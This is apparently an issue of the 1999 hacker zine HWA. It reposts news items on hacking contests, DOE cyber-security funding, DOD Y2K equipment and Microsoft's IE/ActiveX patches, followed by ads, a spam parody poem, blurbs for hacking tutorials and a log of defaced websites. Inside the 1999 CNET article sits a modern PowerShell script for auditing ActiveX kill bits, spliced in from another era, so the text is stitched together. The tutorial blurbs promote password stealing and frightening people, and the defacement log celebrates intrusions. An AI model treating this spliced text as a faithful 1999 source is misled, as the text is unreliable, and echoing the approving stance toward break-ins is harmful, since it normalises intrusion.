Explain the threat in an academic paper and Microsoft denies it; release a hacking tool like Back Orifice and suddenly they take the vulnerability seriously. @HWA 60.0 WHY HACKING CONTESTS ARE A BAD IDEA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Thursday 30th September 1999 on 9:15 am CET Ira Winkler responds in a commentary to the new trend to test an OS by encouraging people to hack into it. A nice overview of the "don'ts" and inaccuracy of such a manner of testing. Read more HTTP://www.zdnet.com/zdtv/cybercrime/spyfiles/story/0,3700,2343174,00.html?chkpt=zdnnp1ms Why Hacking Contests Are a Bad Idea Contests that encourage people to hack are not a good way to test an OS. By Ira Winkler October 4, 1999 When ZDTV informed me of a hacker contest being sponsored by PC Week, I thought it was a joke. Yet after visiting the site, I'm not laughing. There are so many reasons why this test is a bad idea. Many people, however, might think that a hacker contest is the only way to thoroughly check the security of a system. The logic, as stated on the PC Week website, was to definitively determine which of the two operating systems is more secure: Windows NT or Unix. According to the stated logic, there is no better way to determine security than by having everyone in the world try to break into the systems. Of course, the less secure system would fall first. To make sure that PC Week attracted the best talent in the world to take part in this test, the contest organizers offered a $1,000 reward. To a layperson, this may make sense. There is much more to security than just the operating system. There are two basic methods for breaking into a computer. 1.Exploit problems built into the underlying operating system and applications. 2.Exploit problems with the way that administrators and users configure, manage, and use the system. To first assume that hacking tests are valid, the systems must be configured perfectly. 
That in itself is asking a lot. In Search of Security Then you have to assume that the applications that were used to provide the Web functionality are also secure. After all, you are asking to decide if Windows NT is a good platform-- not if Windows NT with a specific Web server application is secure. If there is an exploitation that compromises the server application, it doesn't mean that the operating system is the problem. The next problem is with the Unix/Linux side of the test. There are many different versions of Unix and Linux. Just because there might be a weakness in Red Hat Linux, for example, doesn't mean that all other versions of Linux have that weakness. Next you have to look at the goal of the test. If the goal is to have someone break into a site and manipulate the webpages, that is one issue. But what happens if someone takes the system down? A Denial of Service attack could be more devastating than if someone actually broke in and modified webpages. In theory a person who has broken into a system can do both, however taking a system down is bad enough. Probably what is most surprising is that the PC Week Linux system was "hacked" first. According to the rules of the "test," this means that Windows NT is more secure than Linux. I don't know any security professional who would buy that argument. And I doubt that Microsoft will now start telling people that NT is more secure than Linux, based on this "test." There are many other reasons, from a technical perspective, as to why this is a bad test. However I should reserve some space for the logistical perspective of using "hackers" to test security. Eyes on the Prize Although the contest organizers at PC Week probably believe that $1,000 is enough to attract the attention of the best hackers in the world, $1,000 is not nearly enough to attract the attention of the more competent hackers. 
Talented security people, whom PC Week expects to attract to the test, can earn as much as $2,000 a day in consulting rates. Additionally there have been other "hacker challenges." These challenges were set up in an unrealistic manner, and the way to collect the "prize" required more effort than it was worth. Past hacker challenges have discouraged the better hackers. Another issue is that you have to assume that everyone has heard about this test. Although there may have been some talk about the challenge on some online forums, this test has definitely not made the rounds. Probably the most serious of the problems is that there is no right way to define "The Most Secure Operating System." However, the most agreed-upon way to examine security is by looking at the source code of the operating system. Microsoft is not about to divulge the source code to PC Week for a detailed examination of Windows NT security. So, what is the most secure operating system? It is simply the system that you can maintain best. Even if you could identify the most secure operating system, it will only be secure as long as it is properly configured, maintained, and used. Therefore, the most potentially secure operating system is the one that you know best. For example, if your organization has administrators who are real NT experts, you would be a fool to use an unfamiliar operating system for no other reason than you think it is more secure. Likewise, people would be fools to turn away from Linux, because it was the first system hacked in the PC Week test. I have seen very secure NT websites, because they were well maintained. I have also seen very unsecure NT websites because they were poorly maintained. PC Week would better serve its readers by testing administrator training programs rather than operating systems. Postscript As the PC Week security test progresses, it continues to show why the test isn't the greatest idea. 
First there is an issue that I didn't want to point out in the original column. About a year ago, I helped ComputerWorld organize a test of firewalls that would have been similar in nature to this hacker challenge. One of the first issues we considered was that if we opened up the test to everyone, people might get bored with hacking the test system and turn their attention to ComputerWorld's operating systems. The people at ComputerWorld decided that this was a very real threat and decided against an open challenge. Now, a series of posts on the PC Week Security Forum openly recommend or encourage the hacking of the Ziff-Davis-owned site as an extension of this test. Whether or not people actually go after the Ziff-Davis site is one story, but a little forethought would have been wise.

The second issue to consider is, as I stated in the original column, that the system must be configured securely by the administrators before a test can be deemed valid. It appears that the Linux hack was a result of a cgi scripting program as well as an unapplied patch (or security fix). Both of these are configuration issues and the result of administration practices, not the underlying software. Again I would recommend that administrator training programs be tested, if you want a really useful security-related test.

@HWA

61.0 NO $35 MILLION FOR DOE CYBER SECURITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/
by Thejian, Wednesday 29th September 1999 on 8:55 pm CET

The Senate yesterday passed an energy appropriations bill that omits $35 million requested by Energy Secretary Bill Richardson for increased computer security. Richardson, traveling overseas, issued a statement charging that Congress was withholding "important tools needed to implement security reform" that Congress itself had demanded and that now "it will be impossible to provide real-time cyber intrusion detection and protection for 70 Energy Department sites."
Newsbytes http://www.newsbytes.com/pubNews/99/137008.html DOE Loses $35 Million for Cyber Security By Walter Pincus and Vernon Loeb, Washington Post WASHINGTON DC, U.S.A., 29 Sep 1999, 9:03 AM CST The Senate yesterday passed an energy appropriations bill that omits $35 million requested by Energy Secretary Bill Richardson for increased computer security. The money was eliminated despite months of heated debate over suspected Chinese espionage, during which leading Republicans accused the Clinton administration of foot-dragging on security. Richardson, traveling overseas, issued a statement charging that Congress was withholding "important tools needed to implement security reform" that Congress itself had demanded. Without the $35 million, Richardson said, "it will be impossible to provide real-time cyber intrusion detection and protection for 70 Energy Department sites." The money was eliminated by a House-Senate conference reconciling differences between the initial versions of the bill passed by the two chambers. A member of the conference committee, who requested anonymity, said the $35 million was eliminated because members "want to see management reform" before they approve a huge funding increase. The committee member noted that Richardson is developing a $450 million cyber security proposal for fiscal 2001. It would include money to replace all personal computers used in classified programs with machines that do not have floppy disk drives, and thus cannot easily be downloaded. Congress's action leaves the department with the $2 million it originally sought for computer security before suspected Chinese espionage came to dominate political debate in Washington last spring. Cyber security, in particular, became a major concern after it was discovered that the government's prime espionage suspect at the Los Alamos National Laboratory, Chinese American physicist Wen Ho Lee, had downloaded classified information to his unclassified computer. 
Lee, who denies passing secrets to China, was fired but has not been charged with any crime. Meanwhile, the Energy Department's director of counterintelligence, Edward J. Curran, acknowledged yesterday that he recommended his brother, a retired police detective, for a $70-an-hour temporary job reviewing counterintelligence operations at the department's three nuclear weapons laboratories. But he said the department's inspector general determined that his recommendation did not violate federal conflict-of-interest statutes. "I recommended my brother, yes, but he does not work directly for me," Curran said. Michael Curran, a veteran of 27 years as a detective for the Waterfront Commission of New York Harbor, has participated in a two-week counterintelligence inspection at Lawrence Livermore National Laboratory in California and is now part of a nine-member team reviewing security at the Los Alamos lab in New Mexico. All told, he will work about six weeks this fall, Edward Curran said, and will participate in additional counterintelligence inspections at Energy Department facilities next year.

Reported by Newsbytes.com, http://www.newsbytes.com 09:03 CST Reposted 11:14 CST

@HWA

62.0 DOD SELLS NON Y2K COMPLIANT EQUIPMENT WITHOUT WARNING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/
by Thejian, Wednesday 29th September 1999 on 8:35 pm CET

The Defense Department donated or sold hundreds of thousands of computers, medical devices and other electronic equipment to state and local agencies, hospitals and other public institutions that could fail to operate because of Year 2000 problems. The medical property included devices critical to health and safety, such as anesthesia apparatus, fetal heart monitors and X-ray equipment.

Read more http://www.fcw.com/pubs/fcw/1999/0927/web-dod-09-28-99.html

SEPTEMBER 28, 1999 . . .
16:54 EDT DOD resold non-Y2K compliant computers, medical devices BY DANIEL VERTON (dan_verton@fcw.com) The Defense Department donated or sold hundreds of thousands of computers, medical devices and other electronic equipment to state and local agencies, hospitals and other public institutions that could fail to operate because of Year 2000 problems. In a report released this week, the Pentagon's inspector general found that many of the 340,000 excess medical devices and 77,900 excess computer systems donated or sold by DOD between Oct. 1, 1998, and March 31, 1999, may not have been Year 2000-compliant and could fail to operate properly after Dec. 31. "The medical property included devices critical to health and safety, such as anesthesia apparatus, fetal heart monitors and X-ray equipment," the report stated. However, auditors admitted that the list of 340,000 medical devices also included many items that are not deemed critical to public health and safety and do not rely on date-dependent computer microchips. In one case, the Naval Medical Center in Portsmouth, Va., transferred 9,000 pieces of equipment to the Defense Reutilization and Marketing Service -- the DOD agency responsible for disbursing equipment that is no longer needed -- for sale or donation to other institutions without assessing any of them for potential Year 2000 problems. In fact, of the 9,000 items cited, 2,000 posed a high or medium health risk, the report stated. According to the IG, plans called for these items to be transferred or sold to the DOD Humanitarian Assistance Program, the Indian Health Service, state and local agencies and the general public. In addition to medical devices, the Defense Information Systems Agency and the Defense Logistics Agency sold or donated more than 77,900 pieces of computer equipment to various federal, state and local law enforcement agencies that also may be at risk of Year 2000 failures. 
"DISA did not notify recipients that equipment may not be Y2K compliant or provide a disclaimer that equipment was made available without warranty for fitness of use," the IG report stated. The equipment transferred to law enforcement agencies included various communications security and cryptologic devices, radio navigation equipment and electronic countermeasures equipment. In his response accompanying the report, Marvin Langston, DOD's deputy chief information officer, said the department agrees with the findings of the IG report and is changing its Year 2000 Management Plan to address the disposal of Year 2000-sensitive equipment. "Because of the potential risk to the general public, this document also addresses biomedical equipment turned in to the Defense Reutilization and Marketing Service," Langston said. However, Rear Adm. E.R. Chamberlin, deputy director of DLA, which oversees the various DRMS facilities throughout DOD, said the IG report "exaggerates" the Year 2000 risks associated with excess and surplus equipment, particularly medical equipment. "We offer excess and surplus equipment on an 'as is, where is' basis, with no express or implied warranties for fitness of use," Chamberlin said. "DLA reviewed medical items [in the categories audited] and only .2 percent were found to have an embedded chip and none to be date-sensitive," he said.

@HWA

63.0 HATE ON GOVERNMENT WEB SITE
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/
by Thejian, Wednesday 29th September 1999 on 8:25 pm CET

A Florida sheriff is using an official government web site to espouse his views on abortion, school prayer, and the "moral corruption" brought by various social groups and organizations. Because McDougall's message is posted on a site that is apparently taxpayer supported, his words have sparked debate about whether the message constitutes protected free speech or an illegal use of government property to express personal views.
Full story http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2342354,00.html Sheriff's Opinion: Free Speech or Illegal Posting? A Florida law enforcement official posts message on government site blasting gays, abortion, and the ACLU. September 27, 1999 A Florida sheriff is using an official government website to espouse his views on abortion, school prayer, and the "moral corruption" brought by various social groups and organizations. The message, written as a letter by Sheriff John J. McDougall, is posted on the Lee County Sheriff's Office website. It lambastes homosexuals, feminists, atheists, Planned Parenthood, and the American Civil Liberties Union, among others. Because McDougall's message is posted on a site that is apparently taxpayer supported, his words have sparked debate about whether the message constitutes protected free speech or an illegal use of government property to express personal views. However, there is currently no law to force McDougall to pull his message down. In the letter, McDougall says he strongly opposes the elimination of Catholic prayer in public schools. He urges America to "wake up" and fight against "...the diabolical forces of moral corruption working feverishly behind closed doors." He cites as culprits "the gay and lesbian coalitions, rabid feminist groups, United Nations one-world government radicals, and the American Civil Liberties Union." In an ironic twist, the ACLU, one of McDougall's prime targets, is defending his right to speak-- although the Florida chapter of the ACLU called McDougall's viewpoints "disturbing." For more on this story by CyberCrime Legal Analyst Luke Reiter, including excerpts of the message and an interview with the Florida ACLU, click on the TV icon above. 
@HWA

64.0 MS: JUST KEEP ON PATCHING
~~~~~~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/
by Thejian, Wednesday 29th September 1999 on 8:00 pm CET

Microsoft has patched a handful of security holes in its Internet Explorer browser and ActiveX technology that made computers vulnerable to attack by malicious Web site operators. The nice folks at Cnet were kind enough to put them together for us one more time (the last hopefully.. nah :).

More info http://news.cnet.com/news/0-1005-200-360962.html?tag=st.ne.1002.tgif?st.ne.fd.gif.e

Microsoft patches Internet Explorer, ActiveX holes
By Paul Festa
Staff Writer, CNET News.com
September 29, 1999, 4:00 a.m. PT

Microsoft has patched a handful of security holes in its Internet Explorer browser and ActiveX technology that made computers vulnerable to attack by malicious Web site operators. The first patch takes care of a problem with IE's ImportExportFavorites feature, which lets users transfer lists of frequently visited Web addresses. The bug lets a malicious Web site operator run executable code on the computer of someone who visits that Web site. "The net result is that a malicious Web site operator potentially could take any action on the computer that the user would be capable of taking," Microsoft warned in a security alert earlier this month. Microsoft's patch eliminates the problem, the company said today. Versions 4.01 and 5.0 of IE are at risk. The patch also fixes a related problem involving ActiveX, Microsoft's technology for bringing interactive scripts and controls to Web pages. ActiveX has long been a security headache for Microsoft. Critics of the technology fault its "trust-based" security model, in which signatures let users choose whether to download an ActiveX control. With this system, users are expected to judge that controls signed by well-known companies like Microsoft are less likely to be maliciously designed than those signed by unknown entities.
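A practitioner's check on that trust model, added here as an example and not code from the CNET article or from Microsoft: the signature prompt only governs the download. Once a control is installed and its vendor has registered it under the "safe for scripting" component category, script on any web page may instantiate and drive it, so the weak point of the model is a control marked safe when it is not. The PowerShell audit below lists every CLSID registered under CATID_SafeForScripting ({7DD95801-9882-11CF-9FA9-00AA006C42C4}) and reports whether Internet Explorer's kill bit (the 0x400 bit of "Compatibility Flags" under the ActiveX Compatibility key) already blocks it; the helper that sets the kill bit is the remedy when no vendor fix is at hand. The function names and output columns are this example's own choices.

```powershell
# Added example (not from the CNET article or from Microsoft): audit ActiveX
# controls registered as "safe for scripting" and show whether IE's kill bit
# already blocks them; Set-ActiveXKillBit applies the block to one CLSID.

# Component category a vendor registers to mark a control scriptable from web pages.
$CatSafeForScripting = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
# Companion category: control accepts initialization data from a page (PARAM / DATA).
$CatSafeForInit      = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'
# Bit in "Compatibility Flags" that tells IE never to load the control (the kill bit).
$KillBitFlag         = 0x400
$CompatRoot          = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility'
$ClsidRoot           = 'Registry::HKEY_CLASSES_ROOT\CLSID'

function Get-KillBitState {
    # Returns $true when the kill bit is set for the given CLSID, $false otherwise.
    param([Parameter(Mandatory)][string]$Clsid)
    $key = "$CompatRoot\$Clsid"
    if (-not (Test-Path $key)) { return $false }
    $flags = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return $false }
    return (([int]$flags -band $KillBitFlag) -ne 0)
}

function Get-SafeForScriptingControls {
    # Walks HKCR\CLSID and keeps each control whose "Implemented Categories" subkey
    # carries CATID_SafeForScripting, i.e. a page's script may create and drive it.
    Get-ChildItem -Path $ClsidRoot -ErrorAction SilentlyContinue | ForEach-Object {
        $clsid   = $_.PSChildName
        $keyPath = "$ClsidRoot\$clsid"
        if (Test-Path "$keyPath\Implemented Categories\$CatSafeForScripting") {
            [pscustomobject]@{
                CLSID    = $clsid
                Name     = (Get-ItemProperty -Path $keyPath -ErrorAction SilentlyContinue).'(default)'
                Server   = (Get-ItemProperty -Path "$keyPath\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
                SafeInit = Test-Path "$keyPath\Implemented Categories\$CatSafeForInit"
                KillBit  = Get-KillBitState -Clsid $clsid
            }
        }
    }
}

function Set-ActiveXKillBit {
    # Sets the kill bit for one CLSID while preserving any other Compatibility Flags bits.
    param([Parameter(Mandatory)][string]$Clsid)
    $key = "$CompatRoot\$Clsid"
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    $current = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $current) { $current = 0 }
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' `
        -Value ([int]$current -bor $KillBitFlag) -Type DWord
}

# Report the scriptable controls that nothing currently blocks.
Get-SafeForScriptingControls |
    Where-Object { -not $_.KillBit } |
    Sort-Object Name |
    Format-Table CLSID, Name, Server, SafeInit -AutoSize
```

Run it from an elevated prompt, since writing the kill bit touches HKLM; reading the report alone needs no privilege. On 64-bit Windows the script covers only the native registry view: 32-bit controls register under HKCR\Wow6432Node\CLSID and a 32-bit browser reads their kill bits from the Wow6432Node copy of the ActiveX Compatibility key, so those two paths need a second pass. A control that shows SafeInit as well as safe-for-scripting deserves the closer look, because a page can then both feed it data and call its methods.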
In the latest discovery, Microsoft identified eight ActiveX controls it said were "incorrectly marked as 'safe for scripting,'" a designation that assures users that they can download the controls without posing any security risk to their own computers. The controls could be manipulated for malicious ends, however, Microsoft said. The controls in question are Kodak Image Edit: Wang Imaging; Kodak Image Annotation: Wang Imaging; Kodak Image Scan: Wang Imaging; Kodak Thumbnail Image: Wang Imaging; Wang Image Admin: Wang Imaging; HHOpen: HTML help files; Registration Wizard: Internet Explorer Product Registration; and IE Active Setup: Internet Explorer Setup. Microsoft credited Bulgarian bug hunter Georgi Guninski with discovering the so-called ImportExportFavorites bug. Richard Smith of Pharlap Software and Australian bug hunter Shane Hird were recognized for discovering the ActiveX problems. @HWA -=----------=- -=----------=- -=----------=- -=----------=- O 0 o O O O 0 -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- END of main news articles content... read on for ads, humour, hacked websites etc -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. 
* * * ***************************************************************************** www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous... 
[ASCII art banner: "Send in your Ascii Art"]

Send in your ASCII art TOO, for inclusion in future issues. Do the HWA logo
etc and we'll showcase it here to show off your talents...remember the 80's?
dig out those ascii editors and do yer best...

[ASCII art: HWA logo]

Subject: Green eggs and spam
From: h-a-v-o-c@v-o-y-a-g-e-r.removedashes.net (Bill Rogers)
Newsgroups: news.admin.net-abuse.email

Wrote something like this a year or so ago but I don't think I ever had the
guts to post it.

Green Eggs and Spam

I love spam.
I'm Spammerman.
Won't you read my email spam?

I will not read your email spam.
Please don't disturb me, Spammerman.

Will you read it in the street?
Don't you think this stock is neat?
Don't you want some kiddie porn
And if you don't, just hit delete?

I will not read it in the street.
You're nuts to think I'll just delete.
Your kiddie porn is sad and sick
I'd like to beat you with a stick!
Your stock is just a sleazy scam
I do not LIKE you, Spammerman.

Will you read it on the beach?
Will you help support Free Speach?
You're in the wrong if you complain.
Murkowski says so, clear and plain.

I will not read it on the beach.
And by the way, it's spelled Free Speech
My email's packed with worthless stuff
And still you think there's not enough!
Just go to hell, that's what to do,
And take that hack Murkowski too!
I'll never read your email spam.
It's wrong and evil, Spammerman!

Will you buy my book that's next
About the secrets of male sex?
Or buy a set of plans from me
To steal your cable shows for free?

I will not buy that book from you
For I've no need.. perhaps YOU do!
I will not steal my cable shows.
Perhaps I could, but you should know
That I am HONEST, Spammerman.
That's something you can't understand.

Will you please Make Money Fast?
just send your money to the last
Address upon this list of four.
And what are you all hostile for?
I've this Remove List that I share.
It's worse than useless, but it's there!

I won't fall for Make Money Fast
So you can ram it up your rectal cavity,
And please don't think my wits are failing
At this twelve thousandth "one time mailing,"
That I'd get on a "remove list"
That makes spam grow and not desist.
But give your real address to me
And we shall see what we shall see.

Oh goody! Send your unmarked bills
My bedroom's in Suburban Hills
But if there's noise you'll start a fight.
My mom works on the streets at night
And Dad is sleeping off his wine.
So tell the postman "Choose your time,
And leave the cash in silent stealth."
Oh good! I've finally made some wealth!

Hey, Spammerman! I've found your place.
It's good to see your zit-pocked face
I'd like to tell you that I still
Don't read your spam and never will.
I will not read, I will not buy,
I think that those who spam should die!
So NEVER spam me any more.
The end. That's what I came here for.

Oh, who are all these other friends?
Well, just to help you make amends
For all the spamming that you've done,
I've brought your ISP, for one,
To cancel your account for you
And maybe break your kneecaps, too!
And here are Agents One and Two
Of FBI, to talk to you
About the kiddie porno laws
And when they're done, without a pause
The Post Inspection Service here
Would like to make it plainly clear
"Make Money Fast" is not legit
No matter what you claim for it.
And since it's chilly where you are
Ten thousand Netizens brought tar
And warming feathers, and a rail
To give you a free ride to jail.
So have a happy, spammy day!

And with these words, he walked away.
------- End of forwarded message -------

@HWA

SITE.1

#1 http://blacksun.box.sk. The Black Sun
~~~~~~~~~~~~~

Raven sent in this url for his site which kicks some major ass, check it out
for good texts on beginning hacking and just generally how a web site should
look. Nicely done html with a webboard and good selection of texts. Here's a
list straight from the tutorials page;

Tutorials

Finished Tutorials

Networking and its security-related issues

* FTP Tutorial (version 2.1) - covers FTP hacking, FTP commands, what the
  hell is FTP and tons of tips and tricks (not all FTP-related) in the
  newbies corner.

* RM Networks Tutorial (version 1.22) - yes, RM Networks. You know, those
  local networks, not Internet networks... RM Networks are so stupid that
  they rely on the fact that the user is even dumber. Stumbled across one in
  your school/University/college/working place? Want maximum privileges on
  it? Then try this tutorial.

* Ad Blocking Tutorial (version 1.8) - are you tired of seeing stupid
  commercials and popups popping on your screen and chewing up your
  bandwidth? Then read this!

* Sendmail Tutorial (version 2.1) - find out why Sendmail is called 'the
  buggiest daemon on earth', and find out what a daemon is anyway. Tons of
  ways to crack into big computers as well as PCs unleashed, including, of
  course, information on how to block these holes.

* Anonymity Tutorial (version 1.2) - tired of people getting your IP over
  ICQ or IRC? Tired of website owners knowing EVERYTHING about you? Tired of
  people tracing you by your Email address? Read this one and learn how to
  anonymize yourself!

* Proxy/WinGate/SOCKS Tutorial (version 1.0) - don't know what a Proxy is?
  Don't know what a WinGate is? Don't know what a SOCKS firewall is? Wanna
  learn how to increase your anonymity using them? Then read this one.

* Info Gathering Tutorial (version 1.3) - want to find private information
  about people and scare them like hell? Then read this tutorial, you'll
  just love it!
* ICQ Security (version 1.0) - learn about ICQ's security flaws, how to
  exploit them and how to protect yourself from malicious users who use
  these flaws against you. Stealing passwords, reading someone's entire hard
  drive, flooding, spoofing, DoSsing and what not.

IRC-related issues

* IRC Warfare Tutorial (version 1.0) - ever wanted to know how those lamers
  keep taking over your channel and/or kicking you off IRC? Learn to protect
  yourself here!

* Eggdrop Bots Tutorial (coming soon in a few days) - learn how to set up
  your own Eggdrop bots on IRC, and how to send them commands, make them
  execute automated processes or commands on certain conditions or time etc.

Local stuff

* Overclocking Tutorial (version 1.6) - tired of your old CPU? Your outdated
  3D accelerator? Your X-type hardware? Then do some overclocking! Get more
  speed from your hardware for free! This tutorial covers overclocking plus
  lots of explanations about various pieces of hardware like the CMOS chip,
  the Cache chip, your RAM, BUS connections etc.

* Windows Registry Tutorial (version 1.0) - learn more about the Windows
  registry. How does it work, what does it do and what happened to the old
  .ini files?

* Standalone Security (this tutorial wasn't written by a BSRF member. Read
  about what exactly happened here).

* Interesting Things You Didn't Know About Your Computer's Hardware
  (version 1.0) - read Njan's amazing tutorial about all those things you
  always wanted to know about PC hardware but never had the guts to ask.

Phreaking

* Phreaking Tutorial (version 1.0) - this should get all those newbie
  phreakers out there started. An excellent tutorial by Squiler, the only
  phreaker aboard BSRF.

* Advanced Phreaking Tutorial (version 1.1) - already finished Squiler's
  phreaking tutorial? Want more? Then this one is for you! More phreaking
  information and techniques, with some more advanced stuff than the
  previous one.
* The Ultimate Phreaking Tutorial II (version 1.0) - liked Squiler's first
  phreaking tutorial? Want more? Then read this one!

Cracking

* Cracking, Part I (version 1.0) - learn how to crack programs by yourself,
  and what the hell cracking means anyway.

Upcoming Tutorials

* DoS Attacks Tutorial - learn how DoS attacks work and how to protect
  yourself against them.

* Eggdrop Bots - learn how Eggdrop bots work and how to set up your own bot.

* PGP Tutorial - learn how PGP works behind the scenes and how to use it.

* The POP Protocol - wanna learn more on how Email works? Wanna delete spam
  and mailbombs on the server, without even having to download them and fill
  your entire inbox? Then read this one once it gets out.

* Cracking, Part II + III - the continuation of Techlord's first cracking
  tutorial.

Translated Tutorials

Overclocking Tutorial (Lithuanian version) - by Saint.

#2 http://members.xoom.com/jcenters/HADL.html The Hackers Anti-Defamation League
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Here's a site that most people should be aware of and try and visit, it's a
good way of getting your feelings across if nothing else... From the site,
almost verbatim;

The Hacker Anti-Defamation League

Since the early 80's, the press has used the term "hacker" to mean a
malicious security breaker, someone who likes to break into computer systems
for fun. This is not a hacker at all. This is in fact a cracker. Hackers
rather, are people who like to break out of boundaries and find solutions to
problems. Hackers not only exist in the software community, they are
musicians, engineers, artists. You can find hackers in almost any field.
Here, we discuss mainly the software hacker: a person who enjoys programming
and exploring computers.

Hackers are the people who built the internet. They created Unix. They made
the world wide web work. Without the work of hackers you wouldn't be viewing
this page today, and I wouldn't have written it. The modern world owes a lot
to hackers.
As a matter of fact, here are the definitions of hacker and cracker as defined
by RFC 1983:

cracker
   A cracker is an individual who attempts to access computer systems
   without authorization. These individuals are often malicious, as opposed
   to hackers, and have many means at their disposal for breaking into a
   system. See also: hacker, Computer Emergency Response Team, Trojan Horse,
   virus, worm.

hacker
   A person who delights in having an intimate understanding of the internal
   workings of a system, computers and computer networks in particular. The
   term is often misused in a pejorative context, where "cracker" would be
   the correct term. See also: cracker.

You can send in submissions for this section too if you've found (or RUN) a
cool site...

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups
like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while, for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...

Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

check out http://www.attrition.org/mirror/attrition/groups.html to see who you
are up against. You can often gather intel from IRC as many of these groups
maintain a presence by having a channel with their group name as the channel
name, others aren't so obvious but do exist.
[9/20/99]
Defaced: http://www.adrian.edu/
By: bl0w team
Mirror: http://www.attrition.org/mirror/attrition/1999/09/20/www.adrian.edu
OS: NT

[9/20/99]
Defaced: http://www.empirehonda.com/
By: ytcråcker/s0n
Mirror: http://www.attrition.org/mirror/attrition/1999/09/20/www.empirehonda.com
OS: NT

[9/20/99]
Defaced: http://titans.khs.keansburg.k12.nj.us/
By: z0mba
Mirror: http://www.attrition.org/mirror/attrition/1999/09/20/titans.khs.keansburg.k12.nj.us
OS: Solaris

[9/20/99]
Defaced: http://www.euromicron.com/
By: HIT2000
Mirror: http://www.attrition.org/mirror/attrition/1999/09/20/www.euromicron.com
OS: NT

[9/20/99]
Defaced: http://www.g0ddess.com/
By: Unknown
Mirror: http://www.attrition.org/mirror/attrition/1999/09/20/www.g0ddess.com
OS: FreeBSD
Note: The defacement consists of a comment within the HTML of the mirror

[99.09.24] NT [HIT2000]        Comavenir (www.comavenir.com)
[99.09.24] NT [eternal]        King Sport Connection (www.kingsportconnection.org)
[99.09.24] Ir [ ]              Arizona Libertarian Party (www.lpaz.org)

The 'lpaz' hack is interesting. No elite speak, no cussing. A seemingly true
political hack.

[9/24/99]
defaced: www.iphone.com
by: (unknown)
mirror: http://www.attrition.org/mirror/attrition/1999/09/24/www.iphone.com/
note: a targeted hack. message is relevant to the domain defaced.

[99.09.25] NT [fEAR-mE]        Thesaurus (www.thesaurus.net)
[99.09.25] Li [TREATY]         FIS Gov (BO) (beta.fis.gov.bo)
[99.09.25] So [^CrackPyrate]   NKFU Edu (TW) (ccms.nkfu.edu.tw)
[99.09.25] So [mistuh clean]   MediaCity (SG) (pi.mediacity.com.sg)
[99.09.25] NT [HIT2000]        France Commerce (www.franceecommerce.com)
[99.09.25] So [weLLfaRe]       Plastic Politics (www.plasticpolitics.com)
[99.09.26] So [TREATY]       M Carelba (IT) (carelba.it)
[99.09.26] Li [Pakistan HC]    Emerald Systems (www.emeraldsystems.com)
[99.09.26] NT [139_r00ted]     #2 Hoffman Bikes (www.hoffmanbikes.com)
[99.09.26] NT [139_r00ted]     Surweb (www.surweb.org)
